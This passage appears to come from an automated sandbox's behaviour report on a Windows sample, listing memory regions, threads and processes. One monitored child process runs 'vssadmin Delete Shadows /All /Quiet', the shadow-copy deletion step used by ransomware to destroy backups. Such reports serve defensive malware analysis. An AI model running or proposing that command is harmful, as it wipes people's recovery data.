	        filename = ""

Region:
	              id = 1272
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1273
	        start_va = 0x231aa150000
	          end_va = 0x231aa150fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 1274
	        start_va = 0x231aa160000
	          end_va = 0x231aa161fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000231aa160000"
	        filename = ""


Thread:
	id = 41
	os_tid = 0xe9c


Thread:
	id = 43
	os_tid = 0xebc


Thread:
	id = 48
	os_tid = 0xeec


Thread:
	id = 57
	os_tid = 0xf20


Process:
	id = "15"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x33424000"
	os_pid = "0x131c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "13"
	os_parent_pid = "0x1324"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 994
	        start_va = 0x36e00000
	          end_va = 0x36ffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000036e00000"
	        filename = ""

Region:
	              id = 995
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 996
	        start_va = 0xdb76e00000
	          end_va = 0xdb76ffffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000db76e00000"
	        filename = ""

Region:
	              id = 997
	        start_va = 0xdb77000000
	          end_va = 0xdb7703ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000db77000000"
	        filename = ""

Region:
	              id = 998
	        start_va = 0x284fb290000
	          end_va = 0x284fb2affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb290000"
	        filename = ""

Region:
	              id = 999
	        start_va = 0x284fb2b0000
	          end_va = 0x284fb2c4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb2b0000"
	        filename = ""

Region:
	              id = 1000
	        start_va = 0x7df5ff8f0000
	          end_va = 0x7ff5ff8effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff8f0000"
	        filename = ""

Region:
	              id = 1001
	        start_va = 0x7ff7fed90000
	          end_va = 0x7ff7fedb2fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fed90000"
	        filename = ""

Region:
	              id = 1002
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 1003
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1004
	        start_va = 0x284fb2d0000
	          end_va = 0x284fb5affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb2d0000"
	        filename = ""

Region:
	              id = 1005
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1006
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1013
	        start_va = 0x284fb290000
	          end_va = 0x284fb29ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb290000"
	        filename = ""

Region:
	              id = 1014
	        start_va = 0x7ff7fec90000
	          end_va = 0x7ff7fed8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fec90000"
	        filename = ""

Region:
	              id = 1015
	        start_va = 0x284fb2d0000
	          end_va = 0x284fb38dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1016
	        start_va = 0x284fb4b0000
	          end_va = 0x284fb5affff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb4b0000"
	        filename = ""

Region:
	              id = 1017
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1018
	        start_va = 0xdb77040000
	          end_va = 0xdb7707ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000db77040000"
	        filename = ""

Region:
	              id = 1019
	        start_va = 0x284fb390000
	          end_va = 0x284fb40ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb390000"
	        filename = ""

Region:
	              id = 1020
	        start_va = 0x284fb2a0000
	          end_va = 0x284fb2a6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb2a0000"
	        filename = ""

Region:
	              id = 1021
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 1041
	        start_va = 0x284fb390000
	          end_va = 0x284fb390fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb390000"
	        filename = ""

Region:
	              id = 1042
	        start_va = 0x284fb400000
	          end_va = 0x284fb40ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb400000"
	        filename = ""

Region:
	              id = 1043
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1044
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1045
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1046
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1047
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1048
	        start_va = 0x284fb3a0000
	          end_va = 0x284fb3a6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb3a0000"
	        filename = ""

Region:
	              id = 1049
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1050
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1051
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1061
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1062
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 1087
	        start_va = 0x284fb3b0000
	          end_va = 0x284fb3b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb3b0000"
	        filename = ""

Region:
	              id = 1088
	        start_va = 0x284fb3c0000
	          end_va = 0x284fb3c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb3c0000"
	        filename = ""

Region:
	              id = 1089
	        start_va = 0x284fb5b0000
	          end_va = 0x284fb737fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb5b0000"
	        filename = ""

Region:
	              id = 1090
	        start_va = 0x284fb740000
	          end_va = 0x284fb8c0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb740000"
	        filename = ""

Region:
	              id = 1091
	        start_va = 0x284fb8d0000
	          end_va = 0x284fcccffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb8d0000"
	        filename = ""

Region:
	              id = 1092
	        start_va = 0x284fb3d0000
	          end_va = 0x284fb3effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb3d0000"
	        filename = ""

Region:
	              id = 1108
	        start_va = 0xdb77080000
	          end_va = 0xdb770bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000db77080000"
	        filename = ""

Region:
	              id = 1109
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1110
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1111
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1112
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1113
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1114
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1127
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1128
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1129
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1142
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1143
	        start_va = 0x284fccd0000
	          end_va = 0x284fcd7ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fccd0000"
	        filename = ""

Region:
	              id = 1152
	        start_va = 0x284fcd80000
	          end_va = 0x284fd0b6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 1153
	        start_va = 0x284fb410000
	          end_va = 0x284fb469fff
	       monitored = 1
	     entry_point = 0x284fb4253f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 1154
	        start_va = 0x284fb470000
	          end_va = 0x284fb490fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 1185
	        start_va = 0x284fd0c0000
	          end_va = 0x284fd2d5fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fd0c0000"
	        filename = ""

Region:
	              id = 1194
	        start_va = 0x284fd2e0000
	          end_va = 0x284fd4fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fd2e0000"
	        filename = ""

Region:
	              id = 1195
	        start_va = 0x284fd500000
	          end_va = 0x284fd610fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fd500000"
	        filename = ""

Region:
	              id = 1215
	        start_va = 0x284fd620000
	          end_va = 0x284fd839fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fd620000"
	        filename = ""

Region:
	              id = 1216
	        start_va = 0x284fd840000
	          end_va = 0x284fd948fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fd840000"
	        filename = ""

Region:
	              id = 1263
	        start_va = 0xdb770c0000
	          end_va = 0xdb770fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000db770c0000"
	        filename = ""

Region:
	              id = 1264
	        start_va = 0x7ff9589e0000
	          end_va = 0x7ff958b39fff
	       monitored = 0
	     entry_point = 0x7ff958a238e0
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 1265
	        start_va = 0x284fb3d0000
	          end_va = 0x284fb3d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb3d0000"
	        filename = ""

Region:
	              id = 1266
	        start_va = 0x284fb3e0000
	          end_va = 0x284fb3effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb3e0000"
	        filename = ""

Region:
	              id = 1267
	        start_va = 0x284fd950000
	          end_va = 0x284fda0bfff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fd950000"
	        filename = ""

Region:
	              id = 1268
	        start_va = 0x284fb3d0000
	          end_va = 0x284fb3d3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb3d0000"
	        filename = ""

Region:
	              id = 1269
	        start_va = 0x7ff955420000
	          end_va = 0x7ff955441fff
	       monitored = 0
	     entry_point = 0x7ff955421a40
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 1270
	        start_va = 0x7ff955ba0000
	          end_va = 0x7ff955bb2fff
	       monitored = 0
	     entry_point = 0x7ff955ba2760
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 1287
	        start_va = 0x7ff9572a0000
	          end_va = 0x7ff9572f5fff
	       monitored = 0
	     entry_point = 0x7ff9572b0bf0
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 1288
	        start_va = 0x284fb3f0000
	          end_va = 0x284fb3f6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000284fb3f0000"
	        filename = ""

Region:
	              id = 1289
	        start_va = 0x284fb410000
	          end_va = 0x284fb410fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb410000"
	        filename = ""

Region:
	              id = 1290
	        start_va = 0x284fb420000
	          end_va = 0x284fb420fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb420000"
	        filename = ""

Region:
	              id = 1291
	        start_va = 0x284fb430000
	          end_va = 0x284fb434fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "user32.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")

Region:
	              id = 1292
	        start_va = 0x284fb440000
	          end_va = 0x284fb440fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 1297
	        start_va = 0x284fb450000
	          end_va = 0x284fb451fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb450000"
	        filename = ""

Region:
	              id = 1298
	        start_va = 0x7ff94c7c0000
	          end_va = 0x7ff94ca33fff
	       monitored = 0
	     entry_point = 0x7ff94c830400
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")

Region:
	              id = 1299
	        start_va = 0x284fb460000
	          end_va = 0x284fb460fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "windowsshell.manifest"
	        filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")

Region:
	              id = 1300
	        start_va = 0x284fb470000
	          end_va = 0x284fb471fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000284fb470000"
	        filename = ""


Thread:
	id = 45
	os_tid = 0xec0


Thread:
	id = 47
	os_tid = 0xed8


Thread:
	id = 50
	os_tid = 0x1338


Thread:
	id = 59
	os_tid = 0xf34


Process:
	id = "16"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x32d06000"
	os_pid = "0xef0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=U: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1069
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1070
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1071
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1072
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1073
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 1074
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 1075
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1076
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 1077
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 1078
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1079
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 1080
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1081
	        start_va = 0x7fe10000
	          end_va = 0x7fe32fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007fe10000"
	        filename = ""

Region:
	              id = 1082
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1083
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1084
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 1085
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1086
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1105
	        start_va = 0x1c0000
	          end_va = 0x29ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1106
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1107
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1125
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1126
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1139
	        start_va = 0x4600000
	          end_va = 0x477ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 1140
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1141
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
